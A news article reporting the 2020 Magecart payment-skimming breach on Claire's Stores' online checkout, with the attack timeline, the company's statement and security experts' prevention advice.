Accessories retailer Claire's Stores suffered a data breach on its e-commerce website, in which, following common Magecart malpractice, payment skimmers were injected and used to steal customer data.
Claire’s Stores announced on March 17th it would temporarily close all of its North American stores, due to the COVID-19 pandemic.
According to Sansec, which identified the attack, on March 21st the domain claires-assets.com was registered by an anonymous party. In the last week of April, malicious code was added to the online stores of Claire’s and its sister brand Icing. The injected code would intercept any customer information that was entered during checkout, and send it to the claires-assets.com server.
Sansec found the malware was present until June 13th. The organization has since removed the altered code.
“The timeline may indicate that attackers anticipated a surge in online traffic following the lockdown,” Sansec wrote. “The period between exfil domain registration and actual malware suggests that it took the attackers a good four weeks to gain access to the store.”
“The FBI recently released a Private Industry Notification (PIN) about a large number of lookalike domain names registered recently, in this case targeting airports in the United States. These domains can be used to trick reviewers and end-users into believing the malware is legitimate first-party code. A similar lookalike domain was used in the British Airways Magecart attack that resulted in a $230M fine for the company.
“Businesses cannot rely on domain name safelists alone to protect against client-side risks such as Magecart. They need to use client-side application protection solutions to ensure malicious code is discovered and removed before it leads to compliance penalties and brand damage.”
Claire’s made the following statement regarding the attack:
“Claire’s cares about protecting its customers’ data. On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform. We are working diligently to determine the transactions that were involved so that we can notify those individuals. Cards used in our retail stores were not affected by this issue. We have also notified the payment card networks and law enforcement. It is always advisable for cardholders to monitor their account statements for unauthorized charges. The payment card network rules generally provide that cardholders are not responsible for unauthorized charges that are timely reported.”
“There are several prevention techniques for Magecart attacks, and of course the attacks constantly evolve,” notes Brent Johnson, CISO at Bluefin. “Depending on the size and sophistication of a website, prevention can become very difficult. Deploying a File Integrity Monitoring (FIM) solution on the retailer’s website that detects changes to hosted content/files is a good place to start; however, that doesn’t help if the site relies on third party code for hosted features (such as chat windows, shopping carts, etc). If your site relies on code from a third party that’s been infected, the result is the same.”
Hackers know shoppers are going online more during concerns over the coronavirus and retailers need to protect themselves. Research from SiteLock found a third (32%) of customers do not continue to shop with a retailer their information was stolen from and for a majority of shoppers (56%), it will take them about a month to return to shopping with any online retailer after a breach.